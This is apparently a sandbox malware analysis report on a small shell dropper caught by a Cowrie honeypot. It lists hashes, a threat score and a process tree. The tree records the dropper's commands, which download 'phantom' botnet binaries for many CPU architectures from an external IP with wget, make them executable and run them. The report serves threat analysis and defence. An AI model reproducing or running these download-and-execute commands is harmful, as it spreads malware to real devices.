Overview

overview

9

Static

static

data/cowri...585337

debian-9-armhf

data/cowri...585337

debian-9-mips

data/cowri...585337

debian-9-mipsel

data/cowri...585337

ubuntu-18.04-amd64

data/cowri...2a836a

debian-9-armhf

data/cowri...2a836a

debian-9-mips

data/cowri...2a836a

debian-9-mipsel

data/cowri...2a836a

ubuntu-18.04-amd64

data/cowri...aa3de3

debian-9-armhf

9

data/cowri...aa3de3

debian-9-mips

data/cowri...aa3de3

debian-9-mipsel

data/cowri...aa3de3

ubuntu-18.04-amd64

data/cowri...69f8f2

debian-9-armhf

data/cowri...69f8f2

debian-9-mips

data/cowri...69f8f2

debian-9-mipsel

data/cowri...69f8f2

ubuntu-18.04-amd64

data/cowri...96cec0

debian-9-armhf

data/cowri...96cec0

debian-9-mips

data/cowri...96cec0

debian-9-mipsel

data/cowri...96cec0

ubuntu-18.04-amd64

data/cowri...dd766c

debian-9-armhf

5

data/cowri...dd766c

debian-9-mips

5

data/cowri...dd766c

debian-9-mipsel

5

data/cowri...dd766c

ubuntu-18.04-amd64

5

data/cowri...f58ae9

debian-9-armhf

9

data/cowri...f58ae9

debian-9-mips

9

data/cowri...f58ae9

debian-9-mipsel

9

data/cowri...f58ae9

ubuntu-18.04-amd64

9

data/cowri...c8f85d

debian-9-armhf

data/cowri...c8f85d

debian-9-mips

data/cowri...c8f85d

debian-9-mipsel

data/cowri...c8f85d

ubuntu-18.04-amd64

Analysis

  • max time kernel
    0s
  • max time network
    156s
  • platform
    linux_armhf
  • resource
    debian9-armhf-en-20211208
  • resource tags

    arch:armhfimage:debian9-armhf-en-20211208kernel:4.9.0-13-armmp-lpaelocale:en-usos:debian-9-armhfsystem
  • submitted
    18-10-2022 02:32

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    data/cowrie/downloads/dba1abed0c3a0e0e9ae8877d091c6e1ee90373a68cbafc09b907359391dd766c

  • Size

    1KB

  • MD5

    d282aeb196dc438987fa7fee1a0e660f

  • SHA1

    050d2a4da69b9660a3a080292a08ee2db4f94eb3

  • SHA256

    dba1abed0c3a0e0e9ae8877d091c6e1ee90373a68cbafc09b907359391dd766c

  • SHA512

    45fe0bd9a44b8ee979bf03e8557452c3b1026975809ccf13e0b334a31c0b8daef0628464952c4cc78537e08c5d4be96845ae3e700259200b81a0b8177c56d7fb

Score
5/10

Malware Config

Signatures

  • Writes file to tmp directory 1 IoCs

    Malware often drops required files in the /tmp directory.

Processes

  • /tmp/data/cowrie/downloads/dba1abed0c3a0e0e9ae8877d091c6e1ee90373a68cbafc09b907359391dd766c
    /tmp/data/cowrie/downloads/dba1abed0c3a0e0e9ae8877d091c6e1ee90373a68cbafc09b907359391dd766c
    1⤵
    • Writes file to tmp directory
    PID:351
    • /usr/bin/wget
      wget http://154.16.115.249/bins/phantom.x86
      2⤵
        PID:352
      • /bin/cat
        cat phantom.x86
        2⤵
          PID:358
        • /bin/chmod
          chmod +x data robben systemd-private-c3233288b684421da5109ee2d9cf168d-systemd-timesyncd.service-Qv0tw4
          2⤵
            PID:359
          • ./robben
            ./robben Payload
            2⤵
              PID:360
            • /usr/bin/wget
              wget http://154.16.115.249/bins/phantom.mips
              2⤵
                PID:362
              • /bin/cat
                cat phantom.mips
                2⤵
                  PID:364
                • /bin/chmod
                  chmod +x data robben systemd-private-c3233288b684421da5109ee2d9cf168d-systemd-timesyncd.service-Qv0tw4
                  2⤵
                    PID:365
                  • ./robben
                    ./robben Payload
                    2⤵
                      PID:366
                    • /usr/bin/wget
                      wget http://154.16.115.249/bins/phantom.mpsl
                      2⤵
                        PID:368
                      • /bin/cat
                        cat phantom.mpsl
                        2⤵
                          PID:372
                        • /bin/chmod
                          chmod +x data robben systemd-private-c3233288b684421da5109ee2d9cf168d-systemd-timesyncd.service-Qv0tw4
                          2⤵
                            PID:373
                          • ./robben
                            ./robben Payload
                            2⤵
                              PID:374
                            • /usr/bin/wget
                              wget http://154.16.115.249/bins/phantom.arm4
                              2⤵
                                PID:376
                              • /bin/cat
                                cat phantom.arm4
                                2⤵
                                  PID:378
                                • /bin/chmod
                                  chmod +x data robben systemd-private-c3233288b684421da5109ee2d9cf168d-systemd-timesyncd.service-Qv0tw4
                                  2⤵
                                    PID:379
                                  • ./robben
                                    ./robben Payload
                                    2⤵
                                      PID:380
                                    • /usr/bin/wget
                                      wget http://154.16.115.249/bins/phantom.arm5
                                      2⤵
                                        PID:382
                                      • /bin/cat
                                        cat phantom.arm5
                                        2⤵
                                          PID:384
                                        • /bin/chmod
                                          chmod +x data robben systemd-private-c3233288b684421da5109ee2d9cf168d-systemd-timesyncd.service-Qv0tw4
                                          2⤵
                                            PID:385
                                          • ./robben
                                            ./robben Payload
                                            2⤵
                                              PID:386
                                            • /usr/bin/wget
                                              wget http://154.16.115.249/bins/phantom.arm6
                                              2⤵
                                                PID:388
                                              • /bin/cat
                                                cat phantom.arm6
                                                2⤵
                                                  PID:390
                                                • /bin/chmod
                                                  chmod +x data robben systemd-private-c3233288b684421da5109ee2d9cf168d-systemd-timesyncd.service-Qv0tw4
                                                  2⤵
                                                    PID:391
                                                  • ./robben
                                                    ./robben Payload
                                                    2⤵
                                                      PID:392
                                                    • /usr/bin/wget
                                                      wget http://154.16.115.249/bins/phantom.arm7
                                                      2⤵
                                                        PID:394
                                                      • /bin/cat
                                                        cat phantom.arm7
                                                        2⤵
                                                          PID:396
                                                        • /bin/chmod
                                                          chmod +x data robben systemd-private-c3233288b684421da5109ee2d9cf168d-systemd-timesyncd.service-Qv0tw4
                                                          2⤵
                                                            PID:397
                                                          • ./robben
                                                            ./robben Payload
                                                            2⤵
                                                              PID:398
                                                            • /usr/bin/wget
                                                              wget http://154.16.115.249/bins/phantom.ppc
                                                              2⤵
                                                                PID:400
                                                              • /bin/cat
                                                                cat phantom.ppc
                                                                2⤵
                                                                  PID:402
                                                                • /bin/chmod
                                                                  chmod +x data robben systemd-private-c3233288b684421da5109ee2d9cf168d-systemd-timesyncd.service-Qv0tw4
                                                                  2⤵
                                                                    PID:403
                                                                  • ./robben
                                                                    ./robben Payload
                                                                    2⤵
                                                                      PID:404
                                                                    • /usr/bin/wget
                                                                      wget http://154.16.115.249/bins/phantom.m68k
                                                                      2⤵
                                                                        PID:406
                                                                      • /bin/cat
                                                                        cat phantom.m68k
                                                                        2⤵
                                                                          PID:408
                                                                        • /bin/chmod
                                                                          chmod +x data robben systemd-private-c3233288b684421da5109ee2d9cf168d-systemd-timesyncd.service-Qv0tw4
                                                                          2⤵
                                                                            PID:409
                                                                          • ./robben
                                                                            ./robben Payload
                                                                            2⤵
                                                                              PID:410
                                                                            • /usr/bin/wget
                                                                              wget http://154.16.115.249/bins/phantom.sh4
                                                                              2⤵
                                                                                PID:412
                                                                              • /bin/cat
                                                                                cat phantom.sh4
                                                                                2⤵
                                                                                  PID:414
                                                                                • /bin/chmod
                                                                                  chmod +x data robben systemd-private-c3233288b684421da5109ee2d9cf168d-systemd-timesyncd.service-Qv0tw4
                                                                                  2⤵
                                                                                    PID:415
                                                                                  • ./robben
                                                                                    ./robben Payload
                                                                                    2⤵
                                                                                      PID:416

                                                                                  Network

                                                                                  MITRE ATT&CK Matrix

                                                                                  Replay Monitor

                                                                                  Loading Replay Monitor...

                                                                                  Downloads